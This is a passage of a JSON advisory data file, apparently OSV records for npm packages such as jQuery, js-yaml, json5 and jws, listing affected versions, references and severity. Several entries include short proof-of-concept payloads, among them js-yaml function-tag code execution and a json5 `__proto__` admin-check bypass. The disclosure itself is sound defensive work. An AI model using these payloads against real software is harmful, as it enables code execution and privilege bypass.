This allows attackers to execute arbitrary JavaScript in a victim's browser.\n\n\n## Recommendation\n\nUpgrade to version 1.9.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.2.1" }, { "fixed": "1.9.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.2.1" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.2.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": 
"1.2.1" }, { "fixed": "1.9.0" } ] } ], "versions": [ "1.7.2", "1.7.3", "1.8.2", "1.8.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/05/GHSA-q4m3-2j7h-f7xw/GHSA-q4m3-2j7h-f7xw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7656" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/05531fc4080ae24070930d15ae0cea7ae056457d" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/606b863edaff29035960e4d813b45d63b8d92876" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/blob/9e6393b0bcb52b15313f88141d0bd7dd54227426/src/ajax.js#L203" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#220-19-january-2013" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v2.1.4/vendor/assets/javascripts/jquery.js#L7481" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2020-7656.yml" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200528-0001" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JQUERY-569619" }, { "type": "WEB", "url": "https://supportportal.juniper.net/s/article/2021-07-Security-Bulletin-Junos-OS-Multiple-J-Web-vulnerabilities-resolved-in-Junos-OS-21-2R1?language=en_US" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2022.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-05-20T16:17:45Z", "nvd_published_at": "2020-05-19T21:15:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-rmxg-73gg-4p98", 
"published": "2018-01-22T13:32:06Z", "modified": "2024-03-10T05:18:22.438189Z", "aliases": [ "CVE-2015-9251" ], "summary": "Cross-Site Scripting (XSS) in jquery", "details": "Affected versions of `jquery` interpret `text/javascript` responses from cross-origin ajax requests, and automatically execute the contents in `jQuery.globalEval`, even when the ajax request doesn't contain the `dataType` option.\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "affected": [ { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.12.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.12.2" } ] } ], "versions": [ "1.10.0", "1.10.0.1", "1.10.1", "1.10.2", "1.11.0", "1.11.1", "1.11.2", "1.11.3", "1.12.0", "1.12.1", "1.4.1", "1.4.2", "1.4.3", "1.4.4", "1.5.0", "1.5.1", "1.5.2", "1.6.0", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7.0", "1.7.1", "1.7.1.1", "1.7.2", "1.8.0", "1.8.1", "1.8.2", "1.8.3", "1.9.0", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jQuery", "ecosystem": "NuGet", "purl": "pkg:nuget/jQuery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.12.3" }, { "fixed": "3.0.0" } ] } ], "versions": [ "1.12.3", "1.12.4", "2.0.0", "2.0.1", "2.0.1.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jquery", "ecosystem": "npm", "purl": "pkg:npm/jquery" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "1.12.3" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "jquery-rails", "ecosystem": "RubyGems", "purl": "pkg:gem/jquery-rails" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "4.2.0" } ] } ], "versions": [ "0.1.1", "0.1.2", "0.1.3", "0.2", "0.2.1", "0.2.2", "0.2.3", "0.2.4", "0.2.5", "0.2.6", "0.2.7", "1.0", "1.0.1", "1.0.10", "1.0.11", "1.0.12", "1.0.13", "1.0.14", "1.0.15", "1.0.16", "1.0.17", "1.0.18", "1.0.19", "1.0.2", "1.0.3", "1.0.4", "1.0.5", "1.0.6", "1.0.7", "1.0.8", "1.0.9", "1.0.rc", "2.0.1", "2.0.2", "2.0.3", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.3.0", "3.0.0", "3.0.1", "3.0.2", "3.0.3", "3.0.4", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.1.5", "4.0.0", "4.0.0.beta1", "4.0.0.beta2", "4.0.1", "4.0.2", "4.0.3", "4.0.4", "4.0.5", "4.1.0", "4.1.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": "org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.12.2" } ] } ], "versions": [ "1.11.0", "1.11.1", "1.11.3", "1.12.1", "1.7.2", "1.7.3", "1.8.2", "1.8.3", "1.9.1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } }, { "package": { "name": 
"org.webjars.npm:jquery", "ecosystem": "Maven", "purl": "pkg:maven/org.webjars.npm/jquery" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "1.12.3" }, { "fixed": "3.0.0" } ] } ], "versions": [ "1.12.3", "1.12.4", "2.1.0", "2.1.1", "2.1.1-rc1", "2.1.1-rc2", "2.1.3", "2.1.4", "2.2.0", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "3.0.0-alpha1", "3.0.0-beta1", "3.0.0-rc1" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/01/GHSA-rmxg-73gg-4p98/GHSA-rmxg-73gg-4p98.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-9251" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/2432" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/issues/2432#issuecomment-403761229" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/2588" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/pull/2588/commits/c254d308a7d3f1eac4d0b42837804cfffcba4bb2" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/b078a62013782c7424a4a61a240c23c4c0b42614" }, { "type": "WEB", "url": "https://github.com/jquery/jquery/commit/f60729f3903d17917dc351f3ac87794de379b0cc" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0481" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/18" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20210108-0004" }, { "type": "WEB", "url": "https://security.snyk.io/vuln/SNYK-DOTNET-JQUERY-450227" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jquery:20150627" }, { "type": "WEB", "url": "https://sw.aveva.com/hubfs/assets-2018/pdf/security-bulletin/SecurityBulletin_LFSec126.pdf" }, { "type": "WEB", "url": "https://web.archive.org/web/20200227030101/http://www.securityfocus.com/bid/105658" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": 
"https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://www.tenable.com/security/tns-2019-08" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0729" }, { "type": "PACKAGE", "url": "https://github.com/jquery/jquery" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/master/CHANGELOG.md#420" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/blob/v4.2.0/vendor/assets/javascripts/jquery3.js#L9377" }, { "type": "WEB", "url": "https://github.com/rails/jquery-rails/releases/tag/v4.2.0" }, { "type": "WEB", "url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/jquery-rails/CVE-2015-9251.yml" }, { "type": "WEB", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-212-04" }, { "type": "WEB", "url": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ba79cf1658741e9f146e4c59b50aee56656ea95d841d358d006c18b6@%3Ccommits.roller.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00041.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/152787/dotCMS-5.1.1-Vulnerable-Dependencies.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/153237/RetireJS-CORS-Issue-Script-Execution.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/156743/OctoberCMS-Insecure-Dependencies.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/10" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/11" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2019/May/13" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:55:10Z", "nvd_published_at": "2018-01-18T23:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-2pr6-76vf-7546", "published": "2019-06-05T14:35:29Z", "modified": "2021-08-04T21:32:56Z", "summary": "Denial of Service in js-yaml", "details": "Versions 
of `js-yaml` prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service.\n\n\n## Recommendation\n\nUpgrade to version 3.13.0.", "affected": [ { "package": { "name": "js-yaml", "ecosystem": "npm", "purl": "pkg:npm/js-yaml" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.13.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-2pr6-76vf-7546/GHSA-2pr6-76vf-7546.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/issues/475" }, { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/commit/a567ef3c6e61eb319f0bfc2671d91061afb01235" }, { "type": "WEB", "url": "https://snyk.io/vuln/SNYK-JS-JSYAML-173999" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/788" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/788/versions" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2019-06-05T13:52:07Z", "nvd_published_at": null, "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8j8c-7jfh-h6hx", "published": "2019-06-04T20:14:07Z", "modified": "2020-08-31T18:36:43Z", "summary": "Code Injection in js-yaml", "details": "Versions of `js-yaml` prior to 3.13.1 are vulnerable to Code Injection. The `load()` function may execute arbitrary code injected through a malicious YAML file. Objects that have `toString` as key, JavaScript code as value and are used as explicit mapping keys allow attackers to execute the supplied code through the `load()` function. 
The `safeLoad()` function is unaffected.\n\nAn example payload is \n`{ toString: !\u003ctag:yaml.org,2002:js/function\u003e 'function (){return Date.now()}' } : 1` \nwhich returns the object \n{\n \"1553107949161\": 1\n}\n\n\n## Recommendation\n\nUpgrade to version 3.13.1.", "affected": [ { "package": { "name": "js-yaml", "ecosystem": "npm", "purl": "pkg:npm/js-yaml" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.13.1" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/06/GHSA-8j8c-7jfh-h6hx/GHSA-8j8c-7jfh-h6hx.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/pull/480" }, { "type": "WEB", "url": "https://github.com/nodeca/js-yaml/pull/480/commits/e18afbf1edcafb7add2c4c7b22abc8d6ebc2fa61" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/813" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2019-06-04T20:13:53Z", "nvd_published_at": null, "severity": "HIGH" } }, { "schema_version": "1.7.3", "id": "GHSA-xxvw-45rp-3mj2", "published": "2017-10-24T18:33:37Z", "modified": "2023-11-08T03:57:24.142876Z", "aliases": [ "CVE-2013-4660" ], "summary": "Deserialization Code Execution in js-yaml", "details": "Versions 2.0.4 and earlier of `js-yaml` are affected by a code execution vulnerability in the YAML deserializer.\n\n## Proof of Concept\n```\nconst yaml = require('js-yaml');\n\nconst x = `test: !!js/function \u003e\nfunction f() { \nconsole.log(1); \n}();`\n\nyaml.load(x);\n```\n\n\n## Recommendation\n\nUpdate js-yaml to version 2.0.5 or later, and ensure that all instances where the `.load()` method is called are updated to use `.safeLoad()` instead.", "affected": [ { "package": { "name": "js-yaml", "ecosystem": "npm", "purl": "pkg:npm/js-yaml" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "2.0.5" } ] } ], 
"database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2017/10/GHSA-xxvw-45rp-3mj2/GHSA-xxvw-45rp-3mj2.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-4660" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-xxvw-45rp-3mj2" }, { "type": "WEB", "url": "https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module" }, { "type": "WEB", "url": "https://www.npmjs.com/advisories/16" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T22:05:02Z", "nvd_published_at": null, "severity": "CRITICAL" } }, { "schema_version": "1.7.3", "id": "GHSA-wgfq-7857-4jcc", "published": "2021-05-07T16:47:19Z", "modified": "2023-11-08T04:04:15.903445Z", "aliases": [ "CVE-2020-8237" ], "summary": "Uncontrolled Resource Consumption in json-bigint", "details": "Prototype pollution in json-bigint npm package \u003c 1.0.0 may lead to a denial-of-service (DoS) attack.", "affected": [ { "package": { "name": "json-bigint", "ecosystem": "npm", "purl": "pkg:npm/json-bigint" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/05/GHSA-wgfq-7857-4jcc/GHSA-wgfq-7857-4jcc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-8237" }, { "type": "WEB", "url": "https://hackerone.com/reports/916430" } ], "database_specific": { "cwe_ids": [ "CWE-400" ], "github_reviewed": true, "github_reviewed_at": "2021-04-28T16:57:11Z", "nvd_published_at": "2020-09-18T21:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-896r-f27r-55mw", "published": "2021-11-19T20:16:17Z", "modified": 
"2025-01-17T21:31:38Z", "aliases": [ "CVE-2021-3918" ], "summary": "json-schema is vulnerable to Prototype Pollution", "details": "json-schema before version 0.4.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').", "affected": [ { "package": { "name": "json-schema", "ecosystem": "npm", "purl": "pkg:npm/json-schema" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "0.4.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/11/GHSA-896r-f27r-55mw/GHSA-896r-f27r-55mw.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3918" }, { "type": "WEB", "url": "https://github.com/kriszyp/json-schema/commit/22f146111f541d9737e832823699ad3528ca7741" }, { "type": "WEB", "url": "https://github.com/kriszyp/json-schema/commit/b62f1da1ff5442f23443d6be6a92d00e65cba93a" }, { "type": "WEB", "url": "https://github.com/kriszyp/json-schema/commit/f6f6a3b02d667aa4ba2d5d50cc19208c4462abfa" }, { "type": "PACKAGE", "url": "https://github.com/kriszyp/json-schema" }, { "type": "WEB", "url": "https://huntr.dev/bounties/bb6ccd63-f505-4e3a-b55f-cd2662c261a9" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00013.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20250117-0004" } ], "database_specific": { "cwe_ids": [ "CWE-1321", "CWE-915" ], "github_reviewed": true, "github_reviewed_at": "2021-11-15T22:44:27Z", "nvd_published_at": "2021-11-13T09:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9c47-m6qq-7p4h", "published": "2022-12-29T01:51:03Z", "modified": "2024-02-13T21:31:39Z", "aliases": [ "CVE-2022-46175" ], "summary": "Prototype Pollution in JSON5 via Parse Method", "details": "The `parse` method 
of the JSON5 library up to and including version `2.2.1` does not restrict parsing of keys named `__proto__`, allowing specially crafted strings to pollute the prototype of the resulting object.\n\nThis vulnerability pollutes the prototype of the object returned by `JSON5.parse`, not the global Object prototype; polluting the global Object prototype is the commonly understood definition of Prototype Pollution. However, polluting the prototype of a single object can have significant security impact for an application if the object is later used in trusted operations.\n\n## Impact\nThis vulnerability could allow an attacker to set arbitrary and unexpected keys on the object returned from `JSON5.parse`. The actual impact will depend on how applications utilize the returned object and how they filter unwanted keys, but could include denial of service, cross-site scripting, elevation of privilege, and in extreme cases, remote code execution.\n\n## Mitigation\nThis vulnerability is patched in json5 v2.2.2 and later. A patch has also been backported for json5 v1 in versions v1.0.2 and later.\n\n## Details\n \nSuppose a developer wants to allow users and admins to perform some risky operation, but they want to restrict what non-admins can do. 
To accomplish this, they accept a JSON blob from the user, parse it using `JSON5.parse`, confirm that the provided data does not set some sensitive keys, and then perform the risky operation using the validated data:\n \n```js\nconst JSON5 = require('json5');\n\nconst doSomethingDangerous = (props) =\u003e {\n if (props.isAdmin) {\n console.log('Doing dangerous thing as admin.');\n } else {\n console.log('Doing dangerous thing as user.');\n }\n};\n\nconst secCheckKeysSet = (obj, searchKeys) =\u003e {\n let searchKeyFound = false;\n Object.keys(obj).forEach((key) =\u003e {\n if (searchKeys.indexOf(key) \u003e -1) {\n searchKeyFound = true;\n }\n });\n return searchKeyFound;\n};\n\nconst props = JSON5.parse('{\"foo\": \"bar\"}');\nif (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {\n doSomethingDangerous(props); // \"Doing dangerous thing as user.\"\n} else {\n throw new Error('Forbidden...');\n}\n```\n \nIf the user attempts to set the `isAdmin` key, their request will be rejected:\n \n```js\nconst props = JSON5.parse('{\"foo\": \"bar\", \"isAdmin\": true}');\nif (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {\n doSomethingDangerous(props);\n} else {\n throw new Error('Forbidden...'); // Error: Forbidden...\n}\n```\n \nHowever, users can instead set the `__proto__` key to `{\"isAdmin\": true}`. 
`JSON5` will parse this key and will set the `isAdmin` key on the prototype of the returned object, allowing the user to bypass the security check and run their request as an admin:\n \n```js\nconst props = JSON5.parse('{\"foo\": \"bar\", \"__proto__\": {\"isAdmin\": true}}');\nif (!secCheckKeysSet(props, ['isAdmin', 'isMod'])) {\n doSomethingDangerous(props); // \"Doing dangerous thing as admin.\"\n} else {\n throw new Error('Forbidden...');\n}\n ```", "affected": [ { "package": { "name": "json5", "ecosystem": "npm", "purl": "pkg:npm/json5" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.2.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-9c47-m6qq-7p4h/GHSA-9c47-m6qq-7p4h.json" } }, { "package": { "name": "json5", "ecosystem": "npm", "purl": "pkg:npm/json5" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "1.0.2" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/12/GHSA-9c47-m6qq-7p4h/GHSA-9c47-m6qq-7p4h.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/json5/json5/security/advisories/GHSA-9c47-m6qq-7p4h" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-46175" }, { "type": "WEB", "url": "https://github.com/json5/json5/issues/199" }, { "type": "WEB", "url": "https://github.com/json5/json5/issues/295" }, { "type": "WEB", "url": "https://github.com/json5/json5/pull/298" }, { "type": "WEB", "url": "https://github.com/json5/json5/commit/62a65408408d40aeea14c7869ed327acead12972" }, { "type": "WEB", "url": "https://github.com/json5/json5/commit/7774c1097993bc3ce9f0ac4b722a32bf7d6871c8" }, { "type": "PACKAGE", "url": "https://github.com/json5/json5" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/11/msg00021.html" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3S26TLPLVFAJTUN3VIXFDEBEXDYO22CE" } ], "database_specific": { "cwe_ids": [ "CWE-1321" ], "github_reviewed": true, "github_reviewed_at": "2022-12-29T01:51:03Z", "nvd_published_at": "2022-12-24T04:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gjcw-v447-2w7q", "published": "2020-09-01T15:23:18Z", "modified": "2023-11-08T03:58:07.352660Z", "aliases": [ "CVE-2016-1000223" ], "summary": "Forgeable Public/Private Tokens in jws", "details": "Affected versions of the `jws` package allow users to select what algorithm the server will use to verify a provided JWT. A malicious actor can use this behaviour to arbitrarily modify the contents of a JWT while still passing verification. For the common use case of the JWT as a bearer token, the end result is a complete authentication bypass with minimal effort.\n\n\n\n\n## Recommendation\n\nUpdate to version 3.0.0 or later.", "affected": [ { "package": { "name": "jws", "ecosystem": "npm", "purl": "pkg:npm/jws" }, "ranges": [ { "type": "SEMVER", "events": [ { "introduced": "0" }, { "fixed": "3.0.0" } ] } ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-gjcw-v447-2w7q/GHSA-gjcw-v447-2w7q.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-1000223" }, { "type": "WEB", "url": "https://github.com/brianloveswords/node-jws/commit/585d0e1e97b6747c10cf5b7689ccc5618a89b299#diff-4ac32a78649ca5bdd8e0ba38b7006a1e" }, { "type": "WEB", "url": "https://auth0.com/blog/2015/03/31/critical-vulnerabilities-in-json-web-token-libraries" }, { "type": "PACKAGE", "url": "https://github.com/brianloveswords/node-jws" }, { "type": "WEB", "url": "https://snyk.io/vuln/npm:jws:20160726" }, { "type": "WEB", "url": 
